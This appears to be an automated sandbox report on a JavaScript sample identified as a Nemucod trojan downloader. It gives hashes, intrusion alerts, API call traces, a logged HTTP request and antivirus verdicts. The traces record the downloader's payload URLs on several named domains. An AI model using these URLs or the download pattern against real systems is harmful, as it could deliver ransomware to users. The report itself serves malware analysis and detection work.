popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

I_139153.js

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 June 25, 2021, 1:27 p.m. June 25, 2021, 1:30 p.m.
Size 13.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 239a49edd5b5a6f189fa10dabe67ac70
SHA256 2a561027c5c1f4daadd16f84e1e268baa9c521373424a558ad4f3abf231ffa93
CRC32 7BB61029
ssdeep 384:rcy40n+gnmUxa2ZVpsw0zrGNDGT3FCmBG08KB2GtlKBeGtocvgH/rNcK1g3A+J64:rcyznxnmUxnVpsw0zrGNDGT3FHBG08Kg
Yara None matched

Name Response Post-Analysis Lookup
www.goliathstoneindustries.com
CNAME goliathstoneindustries.com
A 103.26.41.24
103.26.41.24
schwellenwertdaten.de
goliathstoneindustries.com
A 103.26.41.24
103.26.41.24
sherylbro.net
IP Address Status Action
103.26.41.24 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49805 -> 103.26.41.24:80 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation
TCP 192.168.56.102:49805 -> 103.26.41.24:80 2024508 ET MALWARE Nemucod JS Downloader Aug 01 2017 A Network Trojan was detected

Suricata TLS

No Suricata TLS

request GET http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
host 172.217.25.14
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: http://schwellenwertdaten.de/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

InternetCrackUrlW

 url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

InternetCrackUrlA

 url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

InternetCrackUrlW

 url: http://sherylbro.net/p66/873gfhi3f3r alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0010
http_version:
flags: 4194304
http_method: GET
referer:
path: /p66/873gfhi3f3r%20alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369364 0

InternetCrackUrlW

 url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0

InternetCrackUrlW

 url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: http://schwellenwertdaten.de/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

InternetCrackUrlW

 url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369356 0

send

 buffer: !
socket: 788
sent: 1
1 1 0

send

 buffer: GET /873gfhi3f3r??YhkGTDta=YhkGTDta HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept-Encoding: gzip, deflate Host: goliathstoneindustries.com Connection: Keep-Alive
socket: 976
sent: 236
1 236 0

send

 buffer: !
socket: 788
sent: 1
1 1 0

InternetCrackUrlA

 url: http://goliathstoneindustries.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

InternetCrackUrlW

 url: http://sherylbro.net/p66/873gfhi3f3r alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0010
http_version:
flags: 4194304
http_method: GET
referer:
path: /p66/873gfhi3f3r%20alexandradickman.com/873gfhi3f3r??YhkGTDta=YhkGTDta
1 13369364 0

InternetCrackUrlW

 url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0

InternetCrackUrlW

 url: http://?YhkGTDta=YhkGTDta
flags: 0
0 0
MicroWorld-eScan JS:Trojan.JS.Agent.QYD
CAT-QuickHeal Trojan.JS.Downloader.3345
ALYac JS:Trojan.JS.Agent.QYD
K7GW Trojan ( 005152191 )
K7AntiVirus Trojan ( 005152191 )
Arcabit JS:Trojan.JS.Agent.QYD
Baidu JS.Trojan-Downloader.Nemucod.yf
Cyren JS/Nemucod.CA2!Eldorado
Symantec JS.Downloader.D
ESET-NOD32 JS/TrojanDownloader.Nemucod.DSN
TrendMicro-HouseCall Mal_Cerber-JS03d
Avast Other:Malware-gen [Trj]
Kaspersky Trojan-Downloader.JS.Cryptoload.azt
BitDefender JS:Trojan.JS.Agent.QYD
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
AegisLab Troj.Downloader.Script!c
Tencent Js.Trojan-downloader.Cryptoload.Hqlu
Ad-Aware JS:Trojan.JS.Agent.QYD
Emsisoft JS:Trojan.JS.Agent.QYD (B)
Comodo TrojWare.JS.TrojanDownloader.Nemucod.DSH
F-Secure JS:Trojan.JS.Agent.QYD
DrWeb JS.DownLoader.4265
TrendMicro Mal_Cerber-JS03d
McAfee-GW-Edition BehavesLike.JS.ExploitPdfjsc.lm
Sophos Troj/JSDl-BL
F-Prot JS/Nemucod.CA2!Eldorado
Avira JS/Dldr.Agent.8067
Antiy-AVL Trojan[Downloader]/JS.Nemucod.dbp
Microsoft TrojanDownloader:JS/Nemucod!dta
AhnLab-V3 JS/Downloader
ZoneAlarm Trojan-Downloader.JS.Cryptoload.azt
GData JS:Trojan.JS.Agent.QYD
McAfee JS/Nemucod.oa
MAX malware (ai score=83)
Rising Trojan.JS/Nemucod!1.ACD4 (CLASSIC)
Ikarus Trojan-Ransom.Script.Locky
Fortinet JS/Nemucod.DSQ!tr.dldr
AVG Other:Malware-gen [Trj]
Qihoo-360 virus.js.qexvmc.1